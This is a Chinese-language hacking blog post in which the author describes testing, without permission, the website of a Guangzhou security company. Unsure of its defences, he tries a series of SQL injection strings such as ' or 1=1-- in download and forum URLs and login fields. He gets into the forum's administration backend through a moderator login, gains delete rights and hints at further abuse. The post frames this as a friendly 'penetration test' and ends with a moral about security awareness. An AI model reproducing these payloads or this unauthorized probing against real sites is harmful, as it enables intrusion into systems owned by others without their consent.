笔者一直都有经常性地到一些安全方面的网站瞎逛的习惯的,最近因为一次机缘巧合之下通过链接来到广州某个颇有名气的网络安全公司的网站。说实在的,这个网站好象挺多元化的,提供软件下载之余,还有自己的论坛(嘿嘿,界面做得还真不赖嘛,不知道安全性如何呢?)。出于对其安全操守的好奇,小神决定义务为其做个的初步的“安全渗透测试”。开始时只是拿一些综合性的网络漏洞扫描工具(X-scan3.0、Nmap、Retina等等)进行信息扫描,然后做个结果筛选,结果只查到对方开了TCP80端口(也就是说他们的服务器只提供了正常的HTTP服务),且无任何典型的漏洞....没戏了,对方毕竟还是一间有些知名度的企业嘛(因为这篇文章的重点并不在此,所以用网络漏洞扫描器作信息扫描这个步骤我就不在这里多作说明了)。就这样放弃了吗?没那么容易...恰好小神最近在整理SQL Injection(SQL注入攻击)方面的资料,既然现在有机会就再“勉为其难”地帮它测试一下吧:P
首先是下载系统,随便抽一个工具的下载地址:http://该安全公司的网址/某目录/download/open.asp?id=3444
http://该安全公司的网址/某目录/download/open.asp?id=3444'先测试一下对方有没有过滤'(单引号)...
再试试下面的url,看看能否返回正常的页面...
http://该安全公司的网址/某目录/download/open.asp?id=3444"
http://该安全公司的网址/某目录/download/open.asp?id=3444' or 1=1--
http://该安全公司的网址/某目录/download/open.asp?id=3444" or 1=1--
http://该安全公司的网址/某目录/download/open.asp?id=3444' or 'a'='a
http://该安全公司的网址/某目录/download/open.asp?id=3444" or "a"="a
都是返回“HTTP 500 - 内部服务器错误”,看来是又失败了,不怕,我们还有希望...此时的希望只
能全部寄托在论坛上了...(下图)
循序渐进,首先找来一条帖子的url(这一步笔者挑了:http://该安全公司的网址/论坛目录/list.asp
?ltid=14这条URL)重复刚刚的行为:
http://该安全公司的网址/论坛目录/list.asp?ltid=14'
http://该安全公司的网址/论坛目录/list.asp?ltid=14"
http://该安全公司的网址/论坛目录/list.asp?ltid=14' or 1=1--
http://该安全公司的网址/论坛目录/list.asp?ltid=14" or 1=1--
http://该安全公司的网址/论坛目录/list.asp?ltid=14' or 'a'='a
http://该安全公司的网址/论坛目录/list.asp?ltid=14" or "a"="a
不过看来还是在吃白果...(如下图所示)
除了地址栏,不要忘了还有论坛首页的登陆框:
在“用户名:”区域中输入:
网***' or 1=1--
然后在“密码:”区域中随便输入几个密码看看吧:P(得到下图)
还是不行,试试在密码区域进行注入攻击吧...具体操作:
在“用户名:”中输入:
“网***”
然后在“密码:”中输入:
' or 1=1--
(提交后得到下图)
fail...再用:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
切换了几次,还是不行,看来真的是“坚不可摧”了...“风继续吹,不忍远离...”小神的MP3里哼着‘哥哥’张国荣的歌,难道就这样离开吗?到论坛的首页里再逛一圈吧....一扫眼,还真道灵光,注意一下论坛登陆区域上方的小链接,看到了吧?第三条链接是什么呢?
单击后跳出如下图所示的登陆窗口:
首先在“论坛:”这一拦选中相应的版面(这里笔者挑了第一个版面“安全工具”),然后再重新尝试一下:
帐号: 网***' or 1=1--
密码: 任意密码
不行,再试试:
帐号: 网***
密码: ' or 1=1--
......
......
小神的手颤了一下,只因“有颜色的界面”出来了:
开始时以为是假象,连忙点击“进入后台>>>”...
这次看来是真的了,点击其中一条帖子再测试一下:
(看到了吧?有“删除”按钮了也...其实我们可以做的还不只这些...PS:小神可是个好孩子哦^_^)写到这里,也算是有个交代了吧?!^@@^
整篇文章的主旨也不过就是介绍了如何简单地利用SQL注入攻击渗透论坛吧,其实现在再谈SQL注入也是老生常谈了,但想不到连知名的网络安全公司也有这样的漏洞,归根结底就是人们对安全意识的不重视而引起的,这篇文章告诉了我们:不要忽视运作中的一些小细节。
若想了解更多SQL注入技巧的相关信息欢迎登陆笔者的网站http://demonalex.cn.st或email:demonalex@hackermail.com与我联系吧:)。